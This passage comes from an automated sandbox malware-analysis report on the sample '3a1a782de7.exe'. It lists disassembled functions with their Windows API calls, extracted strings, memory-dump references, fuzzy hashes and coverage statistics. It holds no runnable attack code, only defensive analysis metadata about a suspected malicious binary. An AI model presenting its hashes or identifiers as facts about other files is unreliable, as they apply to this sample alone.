Instruction Fuzzy Hash: 25E04F30384209BBEF231B61EC06B993BADDB14B50F144070FA4DB84E1E7A59E9196D4

Function 0031562D Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(375543C4,00000000,00000000,?), ref: 00315690

Part of subcall function 0030E641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0030FDE8,?,00000000,-00000008), ref: 0030E6A2

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 003158E2
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00315928
GetLastError.KERNEL32 ref: 003159CB

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 1b753b152ff474eae44595bc23ff3ed63d9b90deafc4de7d1c3a39088ebfff81
Instruction ID: 25c99efe86fbef5783a9cd9ef1d8f0abf953d8ad734d23f58db83a3542391750
Opcode Fuzzy Hash: 1b753b152ff474eae44595bc23ff3ed63d9b90deafc4de7d1c3a39088ebfff81
Instruction Fuzzy Hash: 28D15B75E04648DFCF1ACFA8D8909EDBBB9FF49310F24452AE456EB251D730A982CB50

Function 0030D8AF Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0030D976
___AdjustPointer.LIBCMT ref: 0030D999
___AdjustPointer.LIBCMT ref: 0030DA35

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: e506f0c5c92d13335bb0464f636d4c6064d5d66f16f7fb372fc1929b41086279
Instruction ID: 80f50517c7f9b3e45ae1a199cd34f25e5a10c74672f6bdd95c4b71b61cecd5ea
Opcode Fuzzy Hash: e506f0c5c92d13335bb0464f636d4c6064d5d66f16f7fb372fc1929b41086279
Instruction Fuzzy Hash: 4F51DE72A06702AFDB2B9F94D861BBAB7E4EF05310F15442DE8429B6D1E731ED40CB90

Function 00313537 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 0030E641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0030FDE8,?,00000000,-00000008), ref: 0030E6A2

GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 0031359B
__dosmaperr.LIBCMT ref: 003135A2
GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 003135DC
__dosmaperr.LIBCMT ref: 003135E3

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: e0596d1eb9336643a8aba78b9c5f97ac02d0531ad4c954a40d81c0d730586a2a
Instruction ID: dd15d66b4e99e09b2af64336d04d32095c14905f5d99c3a9475ddb050115ee14
Opcode Fuzzy Hash: e0596d1eb9336643a8aba78b9c5f97ac02d0531ad4c954a40d81c0d730586a2a
Instruction Fuzzy Hash: 53212C71601705AFCB27AF65D8518ABBBAEFF0A7647004519F8258B540D730EF808B90

Function 00308042 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24b69683ad87b509d98dc27cebab9c80fd70f51e7af922e0dfe60fa3d6cc184a
Instruction ID: f225b823a304b1fadf4abe6511c2c458d01496f45d02bdfb19437673eea25e29
Opcode Fuzzy Hash: 24b69683ad87b509d98dc27cebab9c80fd70f51e7af922e0dfe60fa3d6cc184a
Instruction Fuzzy Hash: 6F21F331602606BFCB23AF61DC7092B77ADAF003647114528F8A58B6C1DF71EC408BA1

Function 0031484F Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00314857

Part of subcall function 0030E641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0030FDE8,?,00000000,-00000008), ref: 0030E6A2

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0031488F
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 003148AF

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: d3527b32ca47e24e2f44fac593dc6304d4e77682cab8159d329badcb45ed2568
Instruction ID: 71629a00ece8bf5b258870a6691d691be08b6b446805cdcc8968bdee8c560a0a
Opcode Fuzzy Hash: d3527b32ca47e24e2f44fac593dc6304d4e77682cab8159d329badcb45ed2568
Instruction Fuzzy Hash: F11166F26032657FA72727B6AC9DCBF295CCE8A3947100824F401E5100FB69CE818671

Function 0030457B Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00304582
std::_Lockit::_Lockit.LIBCPMT ref: 0030458C

Part of subcall function 003024C2: std::_Lockit::_Lockit.LIBCPMT ref: 003024DE
Part of subcall function 003024C2: std::_Lockit::~_Lockit.LIBCPMT ref: 003024F7

codecvt.LIBCPMT ref: 003045C6
std::_Lockit::~_Lockit.LIBCPMT ref: 003045FD

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
String ID:
API String ID: 3716348337-0
Opcode ID: fa456e02e79da3d2f9d8d999f7bbf86b5c2454f466ed000c9e8018956dce88fb
Instruction ID: 368591e520c4c9066363bf38a64e3436d9d3e7c3251fe917a864bee1a19cae9b
Opcode Fuzzy Hash: fa456e02e79da3d2f9d8d999f7bbf86b5c2454f466ed000c9e8018956dce88fb
Instruction Fuzzy Hash: 7C01D2759022198BCB07EBA4D83A6AEB775BF55310F240508E511AF2D1DF749E028B91

Function 0031A4E0 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00319B0F,00000000,00000001,00000000,?,?,00315A1F,?,00000000,00000000), ref: 0031A4F7
GetLastError.KERNEL32(?,00319B0F,00000000,00000001,00000000,?,?,00315A1F,?,00000000,00000000,?,?,?,00315365,00000000), ref: 0031A503

Part of subcall function 0031A554: CloseHandle.KERNEL32(FFFFFFFE,0031A513,?,00319B0F,00000000,00000001,00000000,?,?,00315A1F,?,00000000,00000000,?,?), ref: 0031A564

___initconout.LIBCMT ref: 0031A513

Part of subcall function 0031A535: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0031A4D1,00319AFC,?,?,00315A1F,?,00000000,00000000,?), ref: 0031A548

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00319B0F,00000000,00000001,00000000,?,?,00315A1F,?,00000000,00000000,?), ref: 0031A528

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 588088e286dcce978fc103c55ee2ef7c2babd7857e13073ec1efa3f8f56b40ff
Instruction ID: 19ddc9f1c0e224159f3045ba4a1917b3888af674dda55aaf0ab46b82a442fe51
Opcode Fuzzy Hash: 588088e286dcce978fc103c55ee2ef7c2babd7857e13073ec1efa3f8f56b40ff
Instruction Fuzzy Hash: BCF01C36111615BFCF371FA5EC09ADA3F2BFF8A3A1F014514FA4985120D63289619B91

Function 003059A7 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 003059B9
GetCurrentThreadId.KERNEL32 ref: 003059C8
GetCurrentProcessId.KERNEL32 ref: 003059D1
QueryPerformanceCounter.KERNEL32(?), ref: 003059DE

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 1433cc07192675c6800698df1afbc941280be875774aa2d1fb8137d36543219a
Instruction ID: 3caa19a355ca9b0db3279473c4b1e26d88afbd480a2fdf8b943be8bbf1b92a38
Opcode Fuzzy Hash: 1433cc07192675c6800698df1afbc941280be875774aa2d1fb8137d36543219a
Instruction Fuzzy Hash: 97F0AF30D1120CEBCB01EBB4D94999EBBF8FF1D300B9145AAA412E7110E734AB458F50

Function 00312117 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0030E783: GetLastError.KERNEL32(00000000,?,00310AB9), ref: 0030E787
Part of subcall function 0030E783: SetLastError.KERNEL32(00000000,?,?,00000028,0030B9D2), ref: 0030E829

GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00309266,?,?,?,00000055,?,-00000050,?,?,?), ref: 003121D6
IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00309266,?,?,?,00000055,?,-00000050,?,?), ref: 0031220D

Strings

utf8, xrefs: 003122DF

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: ErrorLast$CodePageValid
String ID: utf8
API String ID: 943130320-905460609
Opcode ID: b3ccfecd49b890beeb3bcbbb2114e31c90cd622cfc93a69b063abfffa94e4f27
Instruction ID: da412748b1d00a337ac7dbcd512ee6a1a6303d8bcb3170fef72aba2c07b54247
Opcode Fuzzy Hash: b3ccfecd49b890beeb3bcbbb2114e31c90cd622cfc93a69b063abfffa94e4f27
Instruction Fuzzy Hash: 7B510775640305AAD72FAB748C42BEB73A8EF4C700F110829FA55DB1C1FB74E9E08665

Function 0030DFAC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 126COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0030DEAD,?,?,00000000,00000000,00000000,?), ref: 0030DFD1

Strings

MOC, xrefs: 0030DFE3
RCC, xrefs: 0030DFEB

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 633bca1072d04d981bc78cccbbb84780875a5c131cdbd29a823fac0bc1002ddb
Instruction ID: f0ea04f244b9e62f37153d36158bc0eac0f5bc2608150383145471c65d2cbeae
Opcode Fuzzy Hash: 633bca1072d04d981bc78cccbbb84780875a5c131cdbd29a823fac0bc1002ddb
Instruction Fuzzy Hash: AF417971A01209AFCF26DF98CC91AEEBBB5FF48300F198499FA046B2A1D3759950DB50

Function 0030D818 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0030DA8F

Strings

csm, xrefs: 0030DAB1
csm, xrefs: 0030DB22

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: aeac2d92946b5f346c69a893a4f7f80cc0a708582f813b425ff8a5af73e789f4
Instruction ID: 24a7bc546ff9af1591341248f16155ae0127b69003cf0fe8bfc760da62370d9f
Opcode Fuzzy Hash: aeac2d92946b5f346c69a893a4f7f80cc0a708582f813b425ff8a5af73e789f4
Instruction Fuzzy Hash: 9F31F336502208EBCF239FD4CC609AA7BE5FF08365B1A415AF8444A2A1C332CCA1DB91

Function 003029C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00304B74
___raise_securityfailure.LIBCMT ref: 00304C5C

Strings

xf2, xrefs: 00304C57

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: xf2
API String ID: 3761405300-1590918491
Opcode ID: 84585af63b49aa6710656a75a46e758a9db7882156c3996ac6b2533ca4204266
Instruction ID: ea2c7a8539363f1546018f99ebeafb6eeace2450610443b5316ad4b8911152b2
Opcode Fuzzy Hash: 84585af63b49aa6710656a75a46e758a9db7882156c3996ac6b2533ca4204266
Instruction Fuzzy Hash: 0621BFB4541300DAE723CF29F9966543BF8FF48718F10612EE9048A2A0E3B15986DB44

Function 00304A8C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00304A97
___raise_securityfailure.LIBCMT ref: 00304B54

Strings

xf2, xrefs: 00304B4F

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: xf2
API String ID: 3761405300-1590918491
Opcode ID: 611dbe36683ec1b0f4f88a03d0e4ebdd5b6febd4584e0c839e3d964005abcb53
Instruction ID: 9eb0d07a70c95843920220455471552130a53f8ec46d345d26f1bd963ca0b537
Opcode Fuzzy Hash: 611dbe36683ec1b0f4f88a03d0e4ebdd5b6febd4584e0c839e3d964005abcb53
Instruction Fuzzy Hash: 5F116CB4552344DBD723DF29F9926407BB8FF58308F01A16EE908873A0E7719946DF45

Function 003029D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMONLIBRARYCODE

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(0032648C,ios_base::badbit set,?,?,00301C84,00326478,00301B17), ref: 003029DF
ReleaseSRWLockExclusive.KERNEL32(0032648C,?,?,00301C84,00326478,00301B17), ref: 00302A19

Strings

ios_base::badbit set, xrefs: 003029D8

Memory Dump Source

Source File: 0000000C.00000002.1801442722.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000C.00000002.1801333230.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803017987.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1803443974.0000000000325000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804090278.0000000000326000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804791319.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1804961880.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.1805495616.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300000_3a1a782de7.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID: ios_base::badbit set
API String ID: 17069307-3882152299
Opcode ID: 4148ad074840843b59bcc0f7f1d684fb981f023c2d103b2dae19abdd5175bb53
Instruction ID: 5991af2d62799fea7c75a8e013fb758f751fdd5974c7004a47cbe0076c2eb9ad
Opcode Fuzzy Hash: 4148ad074840843b59bcc0f7f1d684fb981f023c2d103b2dae19abdd5175bb53
Instruction Fuzzy Hash: 54F08C34602240CBC732AF19E819A26BBACFB85734F10032EE89A436E0CB352942CB51

Analysis Process: 3a1a782de7.exePID: 6704, Parent PID: 5232COMMON

Execution Graph

Execution Coverage:	5.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	40.1%
Total number of Nodes:	202
Total number of Limit Nodes:	13

Executed Functions

Function 004361F0 Relevance: 28.6, APIs: 11, Strings: 5, Instructions: 598
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(0044068C,00000000,00000001,0044067C,00000000), ref: 00436437
SysAllocString.OLEAUT32(B17FCF7C), ref: 0043649B
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004364D9
SysAllocString.OLEAUT32(0C5A0A5E), ref: 00436523
SysAllocString.OLEAUT32(793D77C5), ref: 004365C0
VariantInit.OLEAUT32(6A69688F), ref: 0043662B
VariantClear.OLEAUT32(?), ref: 00436794
SysFreeString.OLEAUT32(?), ref: 004367BC
SysFreeString.OLEAUT32(?), ref: 004367C2
SysFreeString.OLEAUT32(00000000), ref: 004367CF
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00436804

Strings

&', xrefs: 00436668
6{9}, xrefs: 00436535
#o0Q, xrefs: 0043655D
>E, xrefs: 0043632B
FG, xrefs: 0043658D

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
String ID: #o0Q$&'$6{9}$>E$FG
API String ID: 2573436264-1634104506
Opcode ID: f01a8ddf4710e9705acc0b1b56aec6f4ed511a30c5a5642ef0e2196324fd1cd6
Instruction ID: df2caf0f2d8f2ccef290ab0009703dfb3a747cc61b8384cf49a70b4a3c164c84
Opcode Fuzzy Hash: f01a8ddf4710e9705acc0b1b56aec6f4ed511a30c5a5642ef0e2196324fd1cd6
Instruction Fuzzy Hash: CC12FC76608301ABD310DF65C884B5BBBE6EFC9318F25882DF5848B391D778D846CB96

Function 00416124 Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 495
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:0:?, xrefs: 00418BF5
fmUn, xrefs: 00418E56
[gir, xrefs: 00418E4F
